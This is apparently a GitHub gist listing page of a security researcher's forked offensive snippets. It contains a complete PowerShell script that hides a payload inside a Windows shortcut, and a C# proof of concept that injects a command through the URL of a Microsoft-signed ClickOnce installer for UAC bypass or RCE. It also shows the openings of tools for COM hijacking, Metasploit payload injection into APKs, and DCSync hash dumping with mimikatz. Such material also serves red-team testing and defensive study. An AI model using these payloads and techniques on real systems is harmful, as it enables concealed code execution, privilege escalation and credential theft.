Skip to content

Instantly share code, notes, and snippets.

@LucaBongiorni
LucaBongiorni / AtomicRedTeam.sct
Created September 30, 2017 06:30
Sample COM Hijacking Atomic Red Team Test
<?XML version="1.0"?>
<scriptlet>
<registration
description="AtomicRedTeam"
progid="AtomicRedTeam"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
@LucaBongiorni
LucaBongiorni / shortcut.ps1
Created January 16, 2017 08:17 — forked from 3gstudent/shortcut.ps1
Hide payload into Windows shortcut
$file = Get-Content "c:\test\test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("c:\test\test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = ' '+ $file
$Shortcut.Save()
@LucaBongiorni
LucaBongiorni / BLEKey.ipynb
Created January 15, 2017 21:09 — forked from blark/BLEKey.ipynb
A quick and dirty Jupyter notebook to convert BLEKey data to cards.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@LucaBongiorni
LucaBongiorni / programmatic_poc.cs
Created November 4, 2016 06:24 — forked from Wack0/programmatic_poc.cs
Command injection in MS' One Step / DPLauncher / "Get ready for the Internet" application, for UAC / RCE through social engineering using MS signed exe / clickonce.
using System;
using System.Runtime.InteropServices;
class DPPwned {
[DllImport("dfshim.dll")]
public static extern int LaunchApplication([MarshalAs(UnmanagedType.LPWStr)] string deploymentUrl,int data,int flags);
public static void Main() {
LaunchApplication("https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+",0,0);
@LucaBongiorni
LucaBongiorni / 8x1080.md
Created October 21, 2016 08:04 — forked from epixoip/8x1080.md
8x Nvidia GTX 1080 Hashcat Benchmarks
@LucaBongiorni
LucaBongiorni / CIPolicyParser.ps1
Created October 16, 2016 19:33 — forked from mattifestation/CIPolicyParser.ps1
Functions to recover information from binary Device Guard Code Integrity policies.
function ConvertTo-CIPolicy {
<#
.SYNOPSIS
Converts a binary file that contains a Code Integrity policy into XML format.
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
.DESCRIPTION
@LucaBongiorni
LucaBongiorni / Rulz.py
Created September 26, 2016 06:13 — forked from monoxgas/Rulz.py
#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs
@LucaBongiorni
LucaBongiorni / apk-embed-payload.rb
Created September 9, 2016 11:58 — forked from skulltech/apk-embed-payload.rb
POC for injecting Metasploit payloads on arbitrary APKs
#!/usr/bin/env ruby
# apk_backdoor.rb
# This script is a POC for injecting metasploit payloads on
# arbitrary APKs.
# Authored by timwr, Jack64
#
require 'nokogiri'
require 'fileutils'
@LucaBongiorni
LucaBongiorni / mubix-lock.sh
Created September 7, 2016 04:50 — forked from binkybear/mubix-lock.sh
mubix-lock.sh
#!/bin/bash
#
# TODO: Add checks for packages
#
# apt-get install -y python git python-pip python-dev screen sqlite3
# pip install pycrypto
# cd /root
# git clone https://github.com/spiderlabs/responder
#
@LucaBongiorni
LucaBongiorni / Invoke-DCSync.ps1
Created September 2, 2016 05:41 — forked from HarmJ0y/Invoke-DCSync.ps1
What more could you want?
This file has been truncated, but you can view the full file.
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Invoke-ReflectivePEInjection